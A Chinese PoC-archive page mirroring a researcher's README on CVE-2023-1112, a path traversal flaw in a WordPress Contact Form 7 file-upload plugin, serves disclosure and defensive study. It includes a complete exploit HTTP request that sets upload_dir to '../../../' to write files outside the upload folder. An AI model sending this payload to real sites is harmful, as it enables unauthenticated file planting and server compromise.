支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: a38151b305553c29d88255fe7d78afa53cf189bc

来源
https://github.com/Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal
关联漏洞
标题:WordPress plugin Drag and Drop Multiple File Upload Contact Form 7 路径遍历漏洞 (CVE-2023-1112)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Drag and Drop Multiple File Upload Contact Form 7 5.0.6.1版本存在安全漏洞,该漏洞源于对参数upload_name的错误操作导致相对路径遍历。
Description
Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 Path Traversal (CVE-2023-1112)
介绍
# CVE-2023-1112 - Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 Path Traversal

# Info
Path Traversal in Drag and Drop Multiple File Uploader PRO - Contact Form 7 version 5.0.6.1 allows unauthenticated remote attacker to upload files anywhere writable on the remote server (CVE-2023-1112).

To exploit this vulnerability, the attacker needs to upload a file using the plugin's form. On this post request there needs to be the parameter `upload_name`, which value is the name of the folder to which the file will be uploaded. The attacker can put anything he wants, such as `../`, `../../../`, `foldername` (it will create the folder "foldername" on the upload directory), etc.

# Example

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.org
Content-Length: 756
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIzvIrbHjHpxzepPi
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="size_limit"

2e+9
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="action"

dnd_codedropz_upload
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_dir"

../../../
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="post_id"

1868
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="security"

0a4dca2b89
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="form_id"

9210
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_name"

foto
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload-file"; filename="pngout.png"
Content-Type: image/png

// image contents
------WebKitFormBoundaryIzvIrbHjHpxzepPi--

```
# Screenshots

### Normal request
![image](https://user-images.githubusercontent.com/3837916/216743824-2a11a7e6-d954-4a1d-ac98-7ddc0d996dcd.png)

### Malicious request
![image](https://user-images.githubusercontent.com/3837916/216743964-378a88d4-ed53-481b-a748-8c09c9868070.png)

### Malicious request successully uploaded the file to the webserver root
![image](https://user-images.githubusercontent.com/3837916/216744024-50997229-58d5-4e76-9e74-aa4c9fc27a00.png)
文件快照

 [4.0K]  /data/pocs/a38151b305553c29d88255fe7d78afa53cf189bc
└── [2.3K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。